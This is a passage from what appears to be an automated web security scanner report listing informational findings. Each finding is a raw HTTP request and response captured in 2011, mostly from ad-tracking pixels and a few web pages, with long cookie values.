Set-Cookie: rsi_segs_1000000=pUPF5E+BcnIQT5v7flOljrhWO8s12LeuB3mXO0kbRHs5mwKNEzRr80lyJOVQXyPwW8UMbjdijA2MBRmXVvxP52YpGojJHfVuNFbLMPTNfEt5F3NGMPlEJSlUFzU83qmL8CHcy7EjPqBaEpAwHEo2hbgOnnQEK+7haef9CSbF87K3sSXiK//N1ZR2YXRw9aeMneRWNP3SMiwj/uIsVReJ5xfyJWWeR/1tmIGEEy4jFW1BdMK85oFzaK4Gne9HQ1k0J76mKN+1hnr9eGmPQGGMb1zyKRrgUqSj1pXUUxhmOMWeWwiI4BTWNka9EKhg59OMwl75DgqlYVnDy30J0qUTTlkPUUuWqbHjKkSJ5ZSy0lz+FfcLPd7TgIIXGMkGTnm1ZctFuYg4P0uvlyAaAaLGBpX9pzn2CqncQo4rfuMEzZ1I+aJ/43cY+hhBPqqzW8ztA3I2KbrufE6WvrunDNWxj5GBeCk5lVxc3d5IdmcvIl/Km+HvC4nb1GPSuYwN44WvqaY7kdveT54gipE8VTyqVUYUaFfbJfA6/3KxO/7f; Domain=.revsci.net; Expires=Mon, 27-Feb-2012 02:21:15 GMT; Path=/
Set-Cookie: rtc_2f1c=MLsPt4EKIQpnJ5Gu09edmxTfnASwjOLB2qAxkJlIjgwSonW0U5nlLWgnBgSYe5upjEOhQrJ5ccegAfxkj1IdLndhrn5xtJ2xpgJ9lR8DPyxSaK4t73835of41ZoUvJScvdsdpxa682sTSwbvNMw51u0OoboChYoYJJ/N9g0pXbcasy7rSAFbo4JHUT5/XjC7S8DtG4urO7ArS/IqJHNXuH5M7y4ylEOgR4u7MzZsTYSWUzhSO7L7UgQc6pepba35fQPkWS5tc8xIQZ7ZXc80vEGpNgHWoQtYFvsiTixUXUCZWcmdDHk6aUJsohEw3901gc3S5KZUWDVjYuuq50T6xkbofDeYDv2cg4i21qrJUWUMF6DtUPtaO9zzrxtYgqGzBKvUnSQ+zbj+iCILRXM9Ig7b1JGFDYxl8WVfzNnUwrPaWY+l2AJ8O8WjJAiDwQHCXzzJFgGZbGVT/NKte1tN+MI/EVbVD7fHwh5ORpU5WYTul7oriL3RLxye2b0S2duX2z6w25NirQ/IQBB1s8BbP5WiYoXYEMczA5IoihBtioMmCpeVHZiZULeVthVzs9DULKcwDajJYBfLSsfsney/exGWIhV3u++tqYea0bZISqUP9gUM42pL6wj3FDKN9R0QVAjotLRqvH1BL0Iki7Bc3jTI0H+RiDRFA/W9UOfDDuDym4meF6YbCpQzGbms9/kpG23MykpfX7OLWbxPMRWMo5DKqs7GWsP4GbXWLs/lCX6TDULFJFUvCHsWhLTTTLn11fpVGhnVth44U8W/GxftzEexJoMrnRRd8AckYl+TcoXuebvY7sRCkSgeU5EcA/IO7Vve58jwewZq/srNcLrMnQfQV+L5xvhYy6TF2hiGybSpSlTwB7GX5hzjs0wQAkeZ4Y+kYsnOQzbaihw7g9NextpDm7v+F9A5CzSG1YXsrtQBo8edABA4pkEYRuMF9gAVSNTWq1k5qp6znxFHkYfH2bOUpjckGEm5/TLvg8whJbnuxMSUHZdN1KGw09T5S+Cvrq2EYxNS3GvcSNZmfHq2Y/qjHK+gjC5Q3iVdxefWYb5QqwRsXjW7m6eIeLApM+0slqQzlH6Xw5PLsx6umKKOs/O8nGj5JVlr3KilG6/hrvOgBaCJpdUOrC6pSaRjkw5QcU5vX3seBcI0vYi03WiXvCBmL7pUU6ijHFZC/Cyxya/snZjBSXDbNL9N/HRTN0u/HVd7MSjrz+yJ+12/fsIjxnnkBaeFpqOBNdAaGGkFPgj7pJR8hO1RirrsX1mxdOSMj0iykeJaoDokpHg/5CpP9xWaoJC0TBZ3hBp42wwTTXigbpjkGKP3TGBKaA6npyjHijt4D99dAq3sspsDGER/R/Pmo69jxA36eyvxkvZbABlK2EDNECCugn4b560TIgtsMn9srvwlvhfbHT2R0frlQRYQkiEYUoi1SoArtkzk/9O2nfKQ/pszsYHdL+jgwu8=; Domain=.revsci.net; Expires=Mon, 27-Feb-2012 02:21:15 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Sun, 27 Feb 2011 02:21:14 GMT

GIF89a.............!.......,...........D..;

7.371. http://pix04.revsci.net/D10889/b3/0/3/noscript.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D10889/b3/0/3/noscript.gif

Request

GET /D10889/b3/0/3/noscript.gif?D=DM_LOC%3Dhttp%253A%252F%252Fbizo.com%253FFAIT%253DT%2526SNEX%253DT%2526INBS%253DT HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/register
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=1a484aca566591c53c93394519ccf266; rsiPus_0="MLsXrEEucT5zIBH3Qpx+rOCHV9wTIf62V307nImZlEBw76YpcfzcZFr0RWvrtRsL1Wr8YdprMhhJd15eFUYGqJstP2duQv8PkdiB0lhkBml9ADYHA1ooiLCxxE4ZbZ6dBJlUHDgyYQ0dWGNgk2mU/6IWZPFutmXvjkfCaZ8XNFt00xjNbdPTO5Zy3pjFEXPPiN9sqakOxmiPznF2pe+333CVmVWtapVbuhz0jSjKWdMeE2eBsBSvtYkc0fmomYLtyi+Lts1umyzd9z/SrKTmNmTnFBMFArLCfjigahHLEoWhBrWvrSf8IrxyRfMTPFuk5iOzQgPN/kcU9HlxpNtUXKVd6mKr30sFlylIwkI9VjAWygBVrOHtwrSI7YvNNUqNCBU5c3lYOKS3+UBPVKDwLi0H3JXAmFxwbNP3r+5Rck+Pdm9kW/4="; NETSEGS_A09802=3161248fde72e26b&A09802&0&4d85fa5c&0&&4d608f7f&0383df689f9c2c8ede3ba30f48f38e86; NETSEGS_J08778=3161248fde72e26b&J08778&0&4d85fa7d&0&&4d6079fc&0383df689f9c2c8ede3ba30f48f38e86; NETSEGS_H07710=3161248fde72e26b&H07710&0&4d85ff07&0&&4d608185&0383df689f9c2c8ede3ba30f48f38e86; NETSEGS_K05540=3161248fde72e26b&K05540&0&4d86087c&0&&4d60a298&0383df689f9c2c8ede3ba30f48f38e86; NETSEGS_I07714=3161248fde72e26b&I07714&0&4d87cbdc&0&&4d6207bf&0383df689f9c2c8ede3ba30f48f38e86; udm_0=MLvvNCMJaSpn3g1VgeeeGzYj5Vhpa0X+RWm0OkSyOoAHLiHCF2aiMSYgQvav5s5BXEH7WYwcF1E2ChHqcXIlcGGzoQLdcDLyMu0y0AA0Z8Ywb39zAGBcUivFd7XrslH4xlWS0JLMFoDGHAkQL7o0hggzHkyvijJhrldtN2/FZ9IbGSBSFXRPil1d8FA8SE9tq8Av2A9P7yxJPBT0R6fbrUmL0oPlHBjObPp63bBa2KCPHlA8U97JgvboTViVooVlgIa+ijmJ7UNvO/hneCdRVmGh2sMbkGByr7B3G3NZLgf2VU0MAK1DLmSuF6v/ZpeNe9qupKNEkk9dX/fUtrqD/eVwLSXygdP/MqbhdS9gMxPvlvexnPgZBq2RLsqflMCLMW/Ug7QgX010f0c5XSERx4iU2hHWhD5UZusAMG/vBszSqMG9E4tznWZMkpS7Pr6KBMnNdmY2TWHmsC3Ai6OjC6sXoW1qf1kRNCJV5Lc3+CtRYEXKUiBZHZmS7gN2G4AXctR3G6S5foI1wyNp0XkgH9gcnoTC/UlM2RTZrDfU3srPWVonhdRi8ZdcMFmAiuTrulA2TDojWoSP939o79qB4DbWBWQlH2DoSPFC/RBM56QVhk3ldDs0KLNc4yMSRLSgl4+ikpPH9GMm5uoAHA2nTYOV6zFc9OgcR9igHW+2yb353Vyg4qNNlP8kR4U7lD9GU0TYYjCPengFG8y/9d4dg4ryRppKiGZpKC72bQZrcdX7lgwSV9w8JeZPW4B8WR5eIJzQ3iVY8AKTRUT66sIpsoLHAF/6Gj+TCF3X+aMdh6sW2cX1+K8qlpZFTOf8RaOgupyEkOy9T/mHOolCQFpAdYRQFMGqh6DUP3cwAZCCT9qNx8x0zRf2gI8+3j+EyoBMURpLP4TBuPZcSgGsPsVyvU8q+Pp+5VqVxmS9YYCIdjINNTf3QhgHE5zh9oiJwasOervR8EwOw1JPuimnazr5nxCaZoNmiNLm3ztI69S5pCpqUVLqDtOgwa2pSABW+O/foe8sKvzUw+f8/STMj441SPBXm90l/wka+279qd1MH/v5PDRz22TctWo5GZb/K/qsI/q0Pu9evZ69mSYGSM/zYB9B8kqeendaGg24bLzNfR1nrrc1dP0YSsMmg4CLBNKOjAb4+vdcWzBFkeEcexFsyMvPVv1IcNJIzArJaQBZJ3Uz1wlEGBe8bq+exaq9P9521+jQ9HmhuTP8/JiI/p+5j0V2M2Qewj5bUUJrU255//Gp7/tKYPxZJ0GkRsfkSQ3EHzOMbDkxZs7yqV7jalN3; NETSEGS_E05516=3161248fde72e26b&E05516&0&4d87cc14&0&&4d61f497&0383df689f9c2c8ede3ba30f48f38e86; NETSEGS_B08725=3161248fde72e26b&B08725&0&4d87cc1e&0&&4d61ce1b&0383df689f9c2c8ede3ba30f48f38e86; rsi_segs_1000000=pUPF5EmhOQMMpzaxu2F29/yoS/lW6GIMz7YBN2Ywebnhm22N58icc4VLatz2X2BRF3c+3i9kN6/hvjXWdPoDyKZJ9j2V2fEaQjVUvaUTOa2MuLgrQWpBo+mqE5zTqx9E2LtGErsJ6qtasgc7r52olzVftKezi0/WQ6QayHvBzAwZTelveRqpDlEzfQ2Xc+Rt8hECjQuDAckHAOyNYqmNsZk0WQWgUv8Tv0wGjor7gdQx4cgLC/7Tpb2tKjg9iRfMtWuT367nE73Ix2g3PjhD87llfRriVSJALzqJfoXAMmL0ouhMpg271OgZOoG9Bj7Hr4q0z3brg5YuY/bnrrUJFuAYNBpk5jneFLggXCL1Dy/vmFwpQa91Dt6FmVXkS5LWcuKvBjRr/+NhUwmdsowiGAdsUDEC8z5NUloX4Bj0UEHaO0RRUGBYt4/gY76ThQco0QiMdzTEHr+Grs4SBnDLysq4Yula9qXuzJ5LPjv1uJMwFGXrRszYhnxm524Z1cMtNotJm7yhpI+umgcoGZ4ct7o=; NETSEGS_J05531=3161248fde72e26b&J05531&0&4d87ccbf&0&&4d61e0ee&0383df689f9c2c8ede3ba30f48f38e86; rtc_0=MLsPt7MKZjprJpE+0lOJgfsH5aYnl6UArV3vG+hNFPi3zzktwvGW5CF7NENZhTSQ6hi5/2M4SDkKe8e7cw5Fait9BSMJJZKk+Saqrw+a63LI0m3nAl8lKUF7fgCvkqi+yTq/VIjpE0ezWLK4wk+VhSG7smJ9hBS1Kj5ZWjwyfPwX0mtyzasDLRm7MAPxiyU4IH+RjhzVxtzfdi3ZPfS0KQAHqIQ3jMx5vlS7NNWBweVY5Z/AQGzmIBxQi/8CucNyw3cLhT08usC09K95OKt2MC/vPoc65Dq/128cUZhUMRx+m660+sq9OVoeQTnEM0rYQhlMhhIVlQ/WdDaRU0GO+hlvqNfmK1foYUsqdEnUJ9QKvPy6jOzqOZ0ELRPXuSavDS8Fd6oqLozq2cbWiHk/RUR2tf3IQR3JJD7i62neQPamBk5kq0WmbGMAHrN9Wj8LXKyiEV203ImH6nq2Q/z5ns+MV7s7KBOOcZD/zMLNrrdVIPrSHTsfhQUWhDKM0f62aYmU2E6xPgKKap/XYnDXxJFPhAtPqdiSBpI+jODWrfACS41/3pn4nx2lEqDOoIOPqUC/H5jRk7/LQNdiqEDdx9becRH4yqgGs1CQ4cmOgXbnFWFftWwCz+i4XnasXqhZrhMi3MMSmDTyPclIEbD16AjdD8QzBLNi+6bEqwSQuja4kKhKlWe/2DkeiQqT/EfLuA6v/kGnXrn1fZuIf3ue3IVBTwKjBhnnhXMgHamHG6NM/r1vEN3ZDgMOj/EIa9U63a2PapsBMLiJXfiWCPe9nX2WzTMrh6Stbm2WsijCxRHK4dlX1/v4O6eX9NLVIdxhsxlKBnZNdZM7/rdwm72flJg69OKLRp1iizqkxU0mQG1LhPxdSYDu+u94A2Vu9CkwSkLSLDE0h6/8NdyTG5bsEJWvBAlViuAMqV83/lU0W9xZ6ai0yahDh4iy9493jy5PbkPpEvNsqYaFLYFGHAWMOxUN3GfIaHxV4Zp2q7iVVtUbJZtvsIholbMQgUcdioAHdhz5Tp1ilkzQRZZq2EKQXww+ETGyF2Xvs7sPjhH47/IOoozvN+Auwc0ITotj/aAupzmEcJFhmPCwj/lh5yckiqWf3qokTqkh3S8GrbMMaXv8GTmQWNhkt10AhTpFSa9Kwhe+8NxGc9ZqacxV0W2Rbp9fb/7n0GhZegsiXvYQ4NBfnE+N+uVDDHaNxaB/jZN6MWSlpVl6xeWpaS5u6jhYUi/Xe6eZSjbWs5VOCAoQf8lyGi/tlr8UjhLpKLO/XdcZe5ZI+OMQ9waea9DkKJxMTwoMhoFqt7jW6Elz0GzPJ68T+JKvOGMOZJi2hZWnyvvEeckI0vBDYdfxicgdVwATm8Ly8Uvd5BcwjphRkj5BIs0zDD15CJ8MYfPi9F906rr5Eg==; rsi_us_1000000=pUMdIy+nMBYU1H0VO98ITfWXt/S6971faUpj9o8GB6CDMi4HHPf9QBO/YxtzaG4Btfq7DS+xMpVMtrAbGhPzCDt/7wBxQy5tJLHhvQ5DlREoMq2TKyynmwfXEC9pR1BXlkq2Q3PtihbhmVaGuVC+719GI46neUGxsMKbA0Tx+6gWMk3jI54XmlOWm0AmYgKFwW0uLFDV7GoPCG46INlpLwLy5aT7IEK0xE1cp+nAp1zs89uwSenDKmhOYhuROjTzNd5YwCAI3km7UW8OE31b0A6iWWSl9cjvZnB3OBkIX1BlX8OKedBsT70vSbuhoV+QhtOs2ii3gDpF9JuMDiOBr0rXeBYDApujkbStdhRv69MFJFo3gRplJi6NCnno90ESOzd2UKDCIHNvJnHiIti0bwWKFKFbrIEngialv6iMk8YvYo5NZSx3rUlRRDJghVUQwyshP2pcXSa12mjaWppDAj4za03Bk9yaBvCjNMTc/PlyJePgcFpLSe3XvmxuSO755w95zCOiFeexNxbEiQKQEUADRL/jCn1M8CMx7LakeHCxi0XoxPUYxgLEc4B6W4wd9oBLKDopfs9mcVDWaDp3orgx0NoCGD6mU4b17G+ZgefqbFHn3l2zMQ/UEenztLzqd3ApHZJyw8HOh9tX4msrE86FFSbpsTvVFPU1yHL8bEo+qOOquFY241gxUL2t0u8ZlH3gwuGNuishpHbASFOelC4yyWeXxVO7WKIPz+CVOAIPJIOpoqmzqYqc3jYNIbHpfTWIvxWy2NfzvULkU8GOJL3tw2qkeoIoLneFNH8tRex90XIMp1638c96KXmfuU0EhQN3YXwy1FMQXT18HYCKUrWKYvnicW6r2R8YZUuhDa1bq7c0FRnZPHWEa5/v/cWdQg6Vd7Sw3Y+LPZC6jsxyu8oz3Q6jqOkS8tvJUVZ8uisKPOzomgK4djS/cGPPg2bv1jLKT3QAQ4uGUSc+MO3TaI3FtwpgAFbEgBg8kXb8QZIuT41QZsoQuAGRvi7LWXalEQF6RGOTEuoPe63D6WoKRtRBJo1yq5eNvxX3YTVBUPueAurzZpmFpdwT+lkv9cDG12RKU/5U6XmmsseF3KTNIc+DG9E6UURJnGj7RMK5Hft7w6nI/yK+xRU/Kwa04wmodLOdhNE0Jppf3r/8MlfrGAeo5Mqo9Op+DcDkzQj/8zWw0BJFa7r7kf46/DEANvBgLOZCcQ4VS+fIS61WzxAWmXvx3SiXNXN9v/AOXEveKsZZpFG9KrGlBBmQhCZkpOLMH0tDNDNMu1f8er/8o2Xt6aIrmOM2+L0GCjSWK+fCqZBSUBu4x1tm21ARcYhC/4fY/DEfe6CrA0AHUoloChS6861ztQ==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5E+huXIQT7uItGF29/yofum2uvdLfQaqLFjosdn5vw/Z0o0sxA4vKqbOnQTLW4dKiyQzhfTHKDaA8PQ/U/z7lrbx9Fv6aCmyIwU58tXwPxrrUegEUYkkllyNqxqLeA1HplflbM08rUIYMjWxq2ViZU9oxqTjU9kbJvk4R3n8UoOc+1NEROgaXqa9bvHgqZ+giu3d0PMcCMPLVLEpqyS/RxnpE3HeW0GEI4ojl7mS6fRNSddzvTMcyAG9Q732AxqlMAP1OOIbuTSAztFLnu2VKcrgTppdvZeWU9cKelJLRzrZlaF8sj+XqZGDTEmWWJBSDhuPInRY0YE/2rsur4UAsmcO22QdHbjAp5869LEIt1z+rXnb5A8eO+dFsz1TN1jkQz5Vpy4PsKBpGLDC30Ob0HkmywV6RP8o+ejNIfIwQE20awNIP/G8eOe2FsROD1sGnU0pVr6LpB4x6E9JcL0emrzmxQURHUuQ924/ItAqPh1L4ZLo0iC4xvgRrGU+E06VFg2LA+bx5epNObgVahxHfGNe7HzC; Domain=.revsci.net; Expires=Mon, 27-Feb-2012 02:18:28 GMT; Path=/
Set-Cookie: rtc_6ZsK=MLsPt4EKYRpvJ5Eu0psOlXkXl67DhaFY1fv8tZ9IjlRQ5XTqupnlL20nBwSYe5uprHOhQrJ5d8egAfx8j/w0K3Hrh2FvjDREXS73y34qKeOt9RClD2rzkZgTnQq2iZf+2Yqd1/CPfpvSXge4/xcTC2ot7gdpav4AVx4mX/Km6XUqszt6Rp5rKrkTqOfY3a4LHfCD+vD7WWpoS7gIVUBMw0wk1/PV4aLG68a0XS7H9Wb0eTVdN8LF6OTvhO9c2ZHFtGl7DfwbirzKFmW+VGLn8y5RNsR6sJhpgUtx/eClSHgPZFupZYtXM65sRV7Sn2Vfzb4EyzcCDea6moyQLZzgwBuPDM137SN+J0oj1KNw81S0zzh9C5SXHpq9oyV5/d/uqaYO/qbWGByUWOPs4Qkjt7gNRhVD1P9gMgqRyUK1KOj7O4ZdK7ArSWjsiodmJqhzasbj25IL885Y/hyIA+UP3Fv6o8TJQ1LZaZ1ZDeZudJ09RoHiD348HHxd/tZC2ehkBM5+QJaqcwU7KA6RDM7v5OJY7QlRJ2eSuLwG047gSY6iO6wZnErqog0zqo6UfLafao+Rql7YIXxzlfbwdSyihp2zJhiV/hCGX51OOWA6YBvgawgMmrQSH7p0lHq/Gda8QBrqHPe2auPM7ADkv66z5vg9KkkYzPLLXR0CXVcEMluEo1PduCa/e8Fu4ufuN+jx2s/mv0E8BwFKfMIJtQgJE5SV4rd+Mpce4xP389qwmh2tvL7+xf9+MKNZu4dvn9Px98ATz/UU50oZdiyJrBWIRuRJXsS4GaxZariFHQOpy5Usn8NPxSsj2unH8FrNrqWxmTA6qFCaWJmYCza3DhH1NbEfoNrjk6/QZ4vqhoEIOIX6XhP4EKsdvxrnU+4+A9z5tzkICHNaDX6F8qxT3D9JLoH10/20nZFsKIaVNT2yT3hPOUBxoACY7WPgmEBr/SvSINGXEUSh8SWtKklDiT9iJOgZc0nSF2OqQaJ7FDzrWRAFM40l0AEZd9Q1umMHal94wSEz5tTvf6QtgRQUdeXQd4YJh3ooEH1cYV+2TNNyExw0BHkUt+BapZVQT3tijSXXZd5jVG7tpupDUvZsKOK3HcEV7qHlW6WJr9KGMMkPwUoW4eavRpJjSyvfcltikVHonLNmgbWc9NQ0+49wO8it3nISCcTWY6Oq1dJ0NS9Z3zcpZLMxCOJu3uQQUxt7EJ8OjxGbKxQmvENglzJfc0IjjnV37SDsyOKt/ADL0S2FvGAKpSZSzDHo6RbVDvaSB+WYY4yK4Pu518pjdemWKAM2a+nYPZmtlW2RoRCHU4GPKoBz01psWSn0azyDNOzdeJZZfr26IsFBzevuY4w7ok0cpd2KXNbCHnkXiqGaYrAfWHpq+FIKH8MQXXCX46odKKkEVq/DqX4q03mWW7qf6do1KA0WzLTkH0NqM5DSjJNu64rSkHOOr4wQ; Domain=.revsci.net; Expires=Mon, 27-Feb-2012 02:18:28 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Sun, 27 Feb 2011 02:18:28 GMT

GIF89a.............!.......,...........D..;

7.372. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Request

GET /pixel;r=1333862182;fpan=1;fpa=P0-1045503868-1298773082174;ns=0;url=http%3A%2F%2Fwww.project-syndicate.org%2F;ref=;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1298773082173;tzo=360;a=p-f8E80KYHdFRZg HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4d5af335-78cce-d894f-1b47b; d=EGwBcAGSBoGxDBy_JQCYNtsV8TcL8QAbNqgTq0GpFsgzAPwgkk6CCEOYKhkbH2aKFYEL4sH1kbNKI_o0

Response

HTTP/1.1 204 No Content
Connection: close
Set-Cookie: d=EA0BcAGTBoHRDBy_JQCYNtsV8TcL8QAbNqgTq0GpFsgzAPwgkk6CCEOYKhkbH2aKFYEL4sH1kbNKI_o0; expires=Sat, 28-May-2011 02:18:15 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Date: Sun, 27 Feb 2011 02:18:15 GMT
Server: QS


7.373. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Request

GET /tap.php?v=6195&rnd1298773097 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?fpc=30dea60-12e64e877f0-4b740973-1&purl=null&jsref=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1512=4d5b2371-3928-7a83-24fb-d52328f5624b; ruid=154d62e1d8adc1d6f3121b12^1^1298325976^2915161843; csi2=3188003.js^1^1298325994^1298325994&3176169.js^1^1298325980^1298325980&3152312.js^1^1298325976^1298325976; au=GKFXS0FR-AL95-10.250.119.239; lm="21 Feb 2011 22:06:39 GMT"; csi15=3188004.js^1^1298326000^1298326000&3193009.js^1^1298325992^1298325992; put_1185=8392341830659049202; put_2081=KH-00000000549735899; cd=false; put_1986=4470455573253905340; put_2025=a7d02798-393f-4104-ada5-fc2c44a755c0; rpb=4222%3D1%265671%3D1%264894%3D1%265328%3D1%266198%3D1%264940%3D1; rpx=4222%3D9869%2C0%2C1%2C%2C%265671%3D9998%2C0%2C1%2C%2C%264894%3D9998%2C0%2C1%2C%2C%265328%3D9998%2C0%2C1%2C%2C%266198%3D10067%2C0%2C1%2C%2C%264940%3D10116%2C0%2C1%2C%2C; put_1994=6pgp44i37uxw

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 02:18:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=4222%3D1%265671%3D1%264894%3D1%265328%3D1%266198%3D1%264940%3D1%266195%3D1; expires=Tue, 29-Mar-2011 02:18:18 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=4222%3D9869%2C0%2C1%2C%2C%265671%3D9998%2C0%2C1%2C%2C%264894%3D9998%2C0%2C1%2C%2C%265328%3D9998%2C0%2C1%2C%2C%266198%3D10067%2C0%2C1%2C%2C%264940%3D10116%2C0%2C1%2C%2C%266195%3D10122%2C0%2C1%2C%2C; expires=Tue, 29-Mar-2011 02:18:18 GMT; path=/; domain=.pixel.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

7.374. http://plancast.com/p/3zbp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://plancast.com
Path:   /p/3zbp

Request

GET /p/3zbp HTTP/1.1
Host: plancast.com
Proxy-Connection: keep-alive
Referer: http://klout.com/blog/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Tue, 01 Mar 2011 14:12:16 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Set-Cookie: plancast=0e6c4296e9725bbc1f030ded83b55a0a; path=/
Content-Length: 85024

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...

7.375. https://profile.microsoft.com/RegSysProfileCenter/wizard.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://profile.microsoft.com
Path:   /RegSysProfileCenter/wizard.aspx

Request

POST /RegSysProfileCenter/wizard.aspx?wizid=345281f9-6588-4888-820f-2695af056d4f&wa=wsignin1.0 HTTP/1.1
Host: profile.microsoft.com
Connection: keep-alive
Referer: https://login.live.com/ppsecure/post.srf?wa=wsignin1.0&rpsnv=11&ct=1298834426&rver=6.0.5276.0&wp=MCMBI&wreply=https:%2F%2Fprofile.microsoft.com%2FRegSysProfileCenter%2Fwizard.aspx%3Fwizid%3D345281f9-6588-4888-820f-2695af056d4f&lc=1033&cb=LCID%3D1033%26WizID%3D345281f9-6588-4888-820f-2695af056d4f%26brand%3DMSDN%2B2010&id=74335&bk=1298834433
Cache-Control: max-age=0
Origin: https://login.live.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; WT_NVR_RU=0=technet:1=:2=; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; omniID=1297806178674_91c6_3334_928f_a989ebdd6d47; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi600017030E02h7030E; vc=vci=1; RegSysReturnUrl=https://profile.microsoft.com/RegSysProfileCenter/wizard.aspx?wizid=345281f9-6588-4888-820f-2695af056d4f; MicrosoftSessionCookie=Microsoft.CookieId=78d5c863-4552-4f86-b8c5-539d334c9fb7&Microsoft.CreationDate=02/27/2011 19:20:26&Microsoft.LastVisitDate=02/27/2011 19:20:33&Microsoft.NumberOfVisits=2&SessionCookie.Id=64CAD3A97B748BF6F74BBEC85B0BED3C; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=02/27/2011 19:20:33&Microsoft.VisitStartDate=02/27/2011 